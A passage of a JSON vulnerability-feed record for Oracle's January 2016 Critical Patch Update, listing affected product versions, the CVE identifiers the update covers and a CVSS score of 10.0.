"Oracle Marketing", "version": "12.1.1", "operator": "le"}, {"name": "Oracle GoldenGate", "version": "12.1.2", "operator": "le"}, {"name": "MICROS CWDirect", "version": "16.0", "operator": "le"}, {"name": "Oracle Field Service", "version": "12.2.5", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.2.4", "operator": "le"}, {"name": "Java VM", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.2.4", "operator": "le"}, {"name": "Oracle Financial Consolidation Hub", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "12.2", "operator": "le"}, {"name": "Oracle Outside In Technology", "version": "8.5.2", "operator": "le"}, {"name": "Oracle Secure Global Desktop", "version": "5.2", "operator": "le"}, {"name": "JD Edwards EnterpriseOne Tools", "version": "9.2", "operator": "le"}, {"name": "Oracle CADView-3D", "version": "12.1.1", "operator": "le"}, {"name": "Oracle CADView-3D", "version": "12.1.3", "operator": "le"}, {"name": "Oracle CRM Technical Foundation", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Interaction Blending", "version": "12.2.4", "operator": "le"}, {"name": "Oracle Retail Order Management System Cloud Service", "version": "5.0", "operator": "le"}, {"name": "PeopleSoft Enterprise SCM eProcurement", "version": "9.1", "operator": "le"}, {"name": "Java SE, Java SE Embedded", "version": "8u66", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "10.3.6", "operator": "le"}, {"name": "PeopleSoft Enterprise SCM eProcurement", "version": "9.2", "operator": "le"}, {"name": "Oracle Retail Open Commerce Platform Cloud Service", "version": "3.5", "operator": "le"}, {"name": "Oracle Financial Consolidation Hub", "version": "12.1.2", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "7u91", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.1.3", "operator": "le"}, {"name": "PeopleSoft Enterprise PeopleTools", "version": "8.55", "operator": "le"}, {"name": "Oracle Advanced Collections", "version": "12.1.2", "operator": "le"}, {"name": "Oracle HCM Configuration Workbench", "version": "12.1.1", "operator": "le"}, {"name": "Oracle Field Service", "version": "12.1.1", "operator": "le"}, {"name": "Sun Network 10GE Switch 72p", "version": "1.2.2.15", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "5.0.10", "operator": "le"}, {"name": "Oracle Endeca Server", "version": "7.6.0.0", "operator": "le"}, {"name": "Java SE, Java SE Embedded", "version": "6u105", "operator": "le"}, {"name": "Oracle Communications Service Broker Engineered System Edition", "version": "6.0", "operator": "le"}, {"name": "Oracle Endeca Server", "version": "7.4.0.0", "operator": "le"}, {"name": "PeopleSoft Enterprise SCM Purchasing", "version": "9.2", "operator": "le"}, {"name": "Oracle Interaction Blending", "version": "12.1.2", "operator": "le"}, {"name": "XML Developer's Kit for C", "version": "11.2.0.4", "operator": "le"}, {"name": "Web Cache", "version": "11.1.1.9.0", "operator": "le"}, {"name": "Oracle Marketing", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle Retail Order Management System Cloud Service", "version": "3.5", "operator": "le"}, {"name": "Oracle Field Service", "version": "12.1.2", "operator": "le"}, {"name": "Oracle Interaction Blending", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle Communications Online Mediation Controller", "version": "6.1", "operator": "le"}, {"name": "Oracle CRM Technical Foundation", "version": "12.2.4", "operator": "le"}, {"name": "Solaris", "version": "11", "operator": "le"}, {"name": "Oracle Email Center", "version": "12.1.1", "operator": "le"}, {"name": "Oracle Secure Global Desktop", "version": "4.63", "operator": "le"}, {"name": "XDB - XML Database", "version": "12.1.0.1", "operator": "le"}, {"name": "Oracle Retail Order Management System Cloud Service", "version": "4.5", "operator": "le"}, {"name": "Oracle Advanced Collections", "version": "12.1.1", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Report Manager", "version": "12.1.3", "operator": "le"}, {"name": "Security", "version": "12.1.0.1", "operator": "le"}, {"name": "Oracle Project Contracts", "version": "12.1.3", "operator": "le"}, {"name": "XML Developer's Kit for C", "version": "12.1.0.1", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.2.5", "operator": "le"}, {"name": "Workspace Manager", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle Communications Service Broker", "version": "6.0", "operator": "le"}, {"name": "Oracle E-Business Intelligence", "version": "12.1.1", "operator": "le"}, {"name": "Oracle Agile PLM", "version": "9.3.1.1", "operator": "le"}, {"name": "Oracle Agile Engineering Data Management", "version": "6.2.0.0", "operator": "le"}, {"name": "Application Mgmt Pack for E-Business Suite", "version": "12.2", "operator": "le"}, {"name": "Enterprise Manager Base Platform", "version": "12.1.0.4", "operator": "le"}, {"name": "Oracle Report Manager", "version": "12.2.3", "operator": "le"}, {"name": "PeopleSoft Enterprise PeopleTools", "version": "8.54", "operator": "le"}, {"name": "Oracle Advanced Collections", "version": "11.5.10.2", "operator": "le"}, {"name": "JD Edwards EnterpriseOne Tools", "version": "9.1", "operator": "le"}, {"name": "Sun Blade 6000 Ethernet Switched NEM 24P 10GE", "version": "1.2.2.13", "operator": "le"}, {"name": "Oracle General Ledger", "version": "11.5.10.2", "operator": "le"}, {"name": "Enterprise Manager Ops Center", "version": "12.2.0", "operator": "le"}, {"name": "MICROS CWDirect", "version": "12.5", "operator": "le"}, {"name": "Oracle Retail Open Commerce Platform Cloud Service", "version": "4.7", "operator": "le"}, {"name": "Oracle Switch ES1-24", "version": "1.3.1.13", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.2.5", "operator": "le"}, {"name": "Oracle HCM Configuration Workbench", "version": "12.1.2", "operator": "le"}, {"name": "Java VM", "version": "12.1.0.2", "operator": "le"}, {"name": "Oracle Field Service", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Universal Work Queue", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle Agile Engineering Data Management", "version": "6.1.2.2", "operator": "le"}, {"name": "XML Developer's Kit for C", "version": "12.1.0.2", "operator": "le"}, {"name": "Oracle Financial Consolidation Hub", "version": "12.1.1", "operator": "le"}, {"name": "Oracle Interaction Center Intelligence", "version": "12.1.2", "operator": "le"}, {"name": "Oracle Applications Manager", "version": "12.1.3", "operator": "le"}, {"name": "PeopleSoft Enterprise HCM Global Payroll Switzerland", "version": "9.2", "operator": "le"}, {"name": "Solaris", "version": "10", "operator": "le"}, {"name": "Oracle Communications Service Broker", "version": "6.1", "operator": "le"}, {"name": "Oracle Human Resources", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "12.2.1", "operator": "le"}, {"name": "Oracle Service Contracts", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle Field Service", "version": "12.2.4", "operator": "le"}, {"name": "Oracle Mobile Application Servlet", "version": "12.2", "operator": "le"}, {"name": "Oracle CADView-3D", "version": "12.1.2", "operator": "le"}, {"name": "Oracle Retail Point-of-Service", "version": "14.1", "operator": "le"}, {"name": "Enterprise Manager Ops Center", "version": "12.2.1", "operator": "le"}, {"name": "PeopleSoft Enterprise SCM Order Management", "version": "9.2", "operator": "le"}, {"name": "Database Vault", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.1.44", "operator": "le"}, {"name": "Enterprise Manager Ops Center", "version": "12.1.4", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "12.1.2", "operator": "le"}, {"name": "Oracle Retail Open Commerce Platform Cloud Service", "version": "5.0", "operator": "le"}, {"name": "Oracle Interaction Center Intelligence", "version": "12.1.3", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.2.36", "operator": "le"}, {"name": "Enterprise Manager Ops Center", "version": "12.3.0", "operator": "le"}, {"name": "MICROS CWDirect", "version": "17.0", "operator": "le"}, {"name": "Oracle Email Center", "version": "12.1.2", "operator": "le"}, {"name": "Oracle Agile PLM", "version": "9.3.2", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.3.36", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle Universal Work Queue", "version": "12.1.2", "operator": "le"}, {"name": "Enterprise Manager Base Platform", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle Retail Order Management System Cloud Service", "version": "15.0", "operator": "le"}, {"name": "Oracle Application Testing Suite", "version": "12.5.0.2", "operator": "le"}, {"name": "Security", "version": "12.1.0.2", "operator": "le"}, {"name": "Oracle Internet Expenses", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle Quality", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.0.36", "operator": "le"}, {"name": "Oracle Agile PLM", "version": "9.3.3", "operator": "le"}, {"name": "Oracle BI Publisher", "version": "11.1.1.7.0", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "6u105", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "12.1.3", "operator": "le"}, {"name": "Security", "version": "11.2.0.4", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "8u66", "operator": "le"}, {"name": "Oracle Universal Work Queue", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Financial Consolidation Hub", "version": "12.1.3", "operator": "le"}, {"name": "Oracle CRM Technology Foundation", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle Project Contracts", "version": "12.1.2", "operator": "le"}, {"name": "Oracle Retail Order Management System Cloud Service", "version": "4.7", "operator": "le"}, {"name": "Oracle Retail Point-of-Service", "version": "14.0", "operator": "le"}, {"name": "Oracle Report Manager", "version": "12.2.4", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Identity Federation", "version": "11.1.1.7", "operator": "le"}, {"name": "Oracle iLearning", "version": "6.0", "operator": "le"}, {"name": "Oracle CRM Technical Foundation", "version": "12.2.3", "operator": "le"}, {"name": "MySQL Server", "version": "5.7.9", "operator": "le"}, {"name": "Oracle Universal Work Queue", "version": "12.1.1", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.3.34", "operator": "le"}, {"name": "Oracle Interaction Center Intelligence", "version": "12.1.1", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.1.2", "operator": "le"}, {"name": "XDB - XML Database", "version": "12.1.0.2", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "12.1", "operator": "le"}, {"name": "Oracle WebLogic Portal", "version": "10.3.6", "operator": "le"}, {"name": "Oracle Outside In Technology", "version": "8.5.0", "operator": "le"}, {"name": "Oracle Interaction Center Intelligence", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle Configurator", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.1.2", "operator": "le"}, {"name": "MySQL Server", "version": "5.5.45", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "12.2.5", "operator": "le"}, {"name": "Oracle Interaction Blending", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Retail Open Commerce Platform Cloud Service", "version": "4.5", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "5.0.14", "operator": "le"}, {"name": "Oracle Mobile Application Servlet", "version": "12.1", "operator": "le"}, {"name": "PeopleSoft Enterprise PeopleTools", "version": "8.53", "operator": "le"}, {"name": "Oracle Service Contracts", "version": "12.1.2", "operator": "le"}, {"name": "Oracle Agile PLM", "version": "9.3.1.2", "operator": "le"}, {"name": "MySQL Server", "version": "5.6.11", "operator": "le"}, {"name": "Oracle BI Publisher", "version": "12.2.1.0.0", "operator": "le"}, {"name": "Oracle Common Applications", "version": "12.1.3", "operator": "le"}, {"name": "Oracle CADView-3D", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle Agile Engineering Data Management", "version": "6.1.3.0", "operator": "le"}, {"name": "Oracle Business Intelligence Enterprise Edition", "version": "11.1.1.9.0", "operator": "le"}, {"name": "Oracle E-Business Intelligence", "version": "12.1.3", "operator": "le"}, {"name": "Database Vault", "version": "12.1.0.1", "operator": "le"}, {"name": "Oracle E-Business Intelligence", "version": "12.1.2", "operator": "le"}, {"name": "Oracle Communications EAGLE LNP Application Processor", "version": "10.0", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Common Applications", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle Identity Federation", "version": "11.1.2.2", "operator": "le"}, {"name": "Oracle Learning Management", "version": "11.5.10.2", "operator": "le"}, {"name": "Enterprise Manager Base Platform", "version": "11.1.0.1", "operator": "le"}, {"name": "Oracle iProcurement", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle Balanced Scorecard", "version": "12.1", "operator": "le"}, {"name": "Oracle Business Intelligence Enterprise Edition", "version": "11.1.1.7.0", "operator": "le"}, {"name": "MySQL Server", "version": "5.6.26", "operator": "le"}, {"name": "Oracle Tuxedo", "version": "12.1.1.0", "operator": "le"}, {"name": "MySQL Server", "version": "5.6.21", "operator": "le"}, {"name": "Enterprise Manager Base Platform", "version": "12.1.0.5", "operator": "le"}, {"name": "Solaris Cluster", "version": "3.3", "operator": "le"}, {"name": "PeopleSoft Enterprise HCM Global Payroll Switzerland", "version": "9.1", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.1.1", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "11.5.10.2", "operator": "le"}, {"name": "Database Vault", "version": "12.1.0.2", "operator": "le"}, {"name": "MySQL Server", "version": "5.5.31", "operator": "le"}, {"name": "Oracle GoldenGate", "version": "11.2", "operator": "le"}, {"name": "Web Cache", "version": "11.1.1.7.0", "operator": "le"}, {"name": "Application Mgmt Pack for E-Business Suite", "version": "12.1", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.1.2", "operator": "le"}, {"name": "Oracle Service Contracts", "version": "12.1.1", "operator": "le"}, {"name": "Oracle Common Applications", "version": "12.1.1", "operator": "le"}, {"name": "Oracle Approvals Management", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.1.1", "operator": "le"}, {"name": "Java VM", "version": "12.1.0.1", "operator": "le"}, {"name": "Oracle Interaction Blending", "version": "12.2.5", "operator": "le"}, {"name": "Oracle Endeca Server", "version": "7.5.0.0", "operator": "le"}, {"name": "Oracle Interaction Blending", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Application Object Library", "version": "11.5.10.2", "operator": "le"}, {"name": "MICROS CWDirect", "version": "15.0", "operator": "le"}, {"name": "Oracle Balanced Scorecard", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle HTTP Server", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "12.2.4", "operator": "le"}, {"name": "MICROS CWDirect", "version": "14.0", "operator": "le"}, {"name": "Oracle GlassFish Server", "version": "3.1.2", "operator": "le"}, {"name": "Oracle Application Testing Suite", "version": "12.4.0.2", "operator": "le"}, {"name": "Oracle E-Business Intelligence", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.2.5", "operator": "le"}, {"name": "Oracle iReceivables", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle Retail Point-of-Service", "version": "13.4", "operator": "le"}, {"name": "Oracle Secure Global Desktop", "version": "4.71", "operator": "le"}, {"name": "Oracle Report Manager", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle Project Contracts", "version": "12.1.1", "operator": "le"}, {"name": "PeopleSoft Enterprise SCM Purchasing", "version": "9.1", "operator": "le"}], "cvelist": ["CVE-2016-0571", "CVE-2016-0528", "CVE-2015-6013", "CVE-2015-4000", "CVE-2016-0608", "CVE-2016-0515", "CVE-2016-0514", "CVE-2016-0600", "CVE-2015-1792", "CVE-2016-0492", "CVE-2016-0611", "CVE-2016-0575", "CVE-2016-0544", "CVE-2016-0599", "CVE-2015-0235", "CVE-2016-0445", "CVE-2016-0500", "CVE-2016-0572", "CVE-2015-1793", "CVE-2016-0592", "CVE-2016-0435", "CVE-2016-0512", "CVE-2015-8126", "CVE-2016-0526", "CVE-2016-0457", "CVE-2016-0594", "CVE-2016-0498", "CVE-2016-0516", "CVE-2016-0580", "CVE-2016-0470", "CVE-2016-0444", "CVE-2016-0577", "CVE-2016-0440", "CVE-2016-0546", "CVE-2015-1789", "CVE-2016-0541", "CVE-2016-0560", "CVE-2016-0428", "CVE-2016-0447", "CVE-2016-0477", "CVE-2016-0568", "CVE-2016-0415", "CVE-2015-0286", "CVE-2016-0489", "CVE-2016-0559", "CVE-2016-0472", "CVE-2016-0578", "CVE-2016-0579", "CVE-2016-0561", "CVE-2014-3583", "CVE-2016-0412", "CVE-2015-3195", "CVE-2016-0449", "CVE-2016-0555", "CVE-2016-0481", "CVE-2016-0511", "CVE-2016-0605", "CVE-2015-4885", "CVE-2016-0455", "CVE-2015-4921", "CVE-2016-0534", "CVE-2016-0414", "CVE-2015-4924", "CVE-2016-0589", "CVE-2016-0474", "CVE-2016-0508", "CVE-2016-0465", "CVE-2016-0553", "CVE-2016-0582", "CVE-2016-0483", "CVE-2013-5855", "CVE-2016-0517", "CVE-2013-5704", "CVE-2016-0454", "CVE-2015-0288", "CVE-2016-0486", "CVE-2013-5605", "CVE-2016-0554", "CVE-2016-0542", "CVE-2016-0591", "CVE-2016-0433", "CVE-2016-0448", "CVE-2016-0506", "CVE-2016-0401", "CVE-2016-0416", "CVE-2016-0437", "CVE-2016-0550", "CVE-2016-0533", "CVE-2016-0403", "CVE-2015-4922", "CVE-2016-0566", "CVE-2016-0606", "CVE-2016-0510", "CVE-2016-0431", "CVE-2015-0285", "CVE-2016-0569", "CVE-2016-0459", "CVE-2016-0471", "CVE-2016-0564", "CVE-2016-0524", "CVE-2016-0563", "CVE-2016-0522", "CVE-2015-3153", "CVE-2016-0616", "CVE-2016-0614", "CVE-2013-1741", "CVE-2015-0207", "CVE-2016-0442", "CVE-2016-0493", "CVE-2016-0443", "CVE-2016-0618", "CVE-2016-0573", "CVE-2016-0527", "CVE-2016-0610", "CVE-2016-0609", "CVE-2016-0570", "CVE-2015-4926", "CVE-2015-0208", "CVE-2015-5307", "CVE-2016-0473", "CVE-2016-0518", "CVE-2013-1740", "CVE-2016-0567", "CVE-2015-7575", "CVE-2016-0558", "CVE-2016-0543", "CVE-2016-0463", "CVE-2016-0487", "CVE-2013-1739", "CVE-2016-0466", "CVE-2016-0462", "CVE-2016-0423", "CVE-2016-0596", "CVE-2016-0535", "CVE-2016-0509", "CVE-2016-0574", "CVE-2014-1492", "CVE-2016-0426", "CVE-2016-0460", "CVE-2016-0504", "CVE-2016-0521", "CVE-2016-0501", "CVE-2013-5606", "CVE-2016-0451", "CVE-2016-0482", "CVE-2015-4808", "CVE-2016-0539", "CVE-2014-0050", "CVE-2016-0404", "CVE-2016-0419", "CVE-2016-0494", "CVE-2015-0293", "CVE-2016-0552", "CVE-2016-0485", "CVE-2014-1490", "CVE-2016-0595", "CVE-2016-0402", "CVE-2016-0480", "CVE-2016-0478", "CVE-2016-0427", "CVE-2015-4919", "CVE-2016-0529", "CVE-2015-7183", "CVE-2016-0503", "CVE-2015-1788", "CVE-2016-0413", "CVE-2016-0476", "CVE-2016-0598", "CVE-2016-0556", "CVE-2015-0209", "CVE-2016-0422", "CVE-2016-0502", "CVE-2016-0601", "CVE-2013-2186", "CVE-2015-3183", "CVE-2015-4920", "CVE-2016-0441", "CVE-2016-0432", "CVE-2016-0484", "CVE-2016-0536", "CVE-2016-0576", "CVE-2015-0204", "CVE-2016-0540", "CVE-2016-0584", "CVE-2016-0537", "CVE-2016-0590", "CVE-2016-0565", "CVE-2016-0420", "CVE-2016-0557", "CVE-2016-0586", "CVE-2016-0417", "CVE-2016-0491", "CVE-2016-0424", "CVE-2015-8472", "CVE-2016-0450", "CVE-2016-0495", "CVE-2016-0520", "CVE-2016-0405", "CVE-2016-0488", "CVE-2015-1790", "CVE-2016-0525", "CVE-2016-0475", "CVE-2016-0499", "CVE-2016-0452", "CVE-2015-6014", "CVE-2016-0548", "CVE-2016-0519", "CVE-2016-0587", "CVE-2016-0461", "CVE-2016-0464", "CVE-2016-0409", "CVE-2016-0438", "CVE-2015-0291", "CVE-2016-0429", "CVE-2016-0497", "CVE-2014-3581", "CVE-2016-0607", "CVE-2015-8370", "CVE-2016-0439", "CVE-2015-0287", "CVE-2014-8109", "CVE-2016-0530", "CVE-2016-0456", "CVE-2016-0496", "CVE-2016-0551", "CVE-2016-0425", "CVE-2016-0421", "CVE-2016-0523", "CVE-2016-0430", "CVE-2015-0289", "CVE-2016-0597", "CVE-2016-0467", "CVE-2016-0581", "CVE-2016-0549", "CVE-2016-0458", "CVE-2014-1491", "CVE-2016-0538", "CVE-2016-0531", "CVE-2015-0292", "CVE-2016-0583", "CVE-2016-0411", "CVE-2016-0507", "CVE-2016-0490", "CVE-2016-0418", "CVE-2014-0107", "CVE-2016-0453", "CVE-2015-7744", "CVE-2016-0513", "CVE-2016-0436", "CVE-2016-0547", "CVE-2016-0588", "CVE-2015-0290", "CVE-2016-0434", "CVE-2016-0446", "CVE-2015-1787", "CVE-2016-0505", "CVE-2015-4852", "CVE-2016-0562", "CVE-2016-0585", "CVE-2015-4923", "CVE-2016-0406", "CVE-2015-1791", "CVE-2015-8104", "CVE-2016-0532", "CVE-2015-4925", "CVE-2015-6015", "CVE-2016-0545", "CVE-2016-0602"], "modified": "2016-02-12T00:00:00", "id": "ORACLE:CPUJAN2016-2367955", "href": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
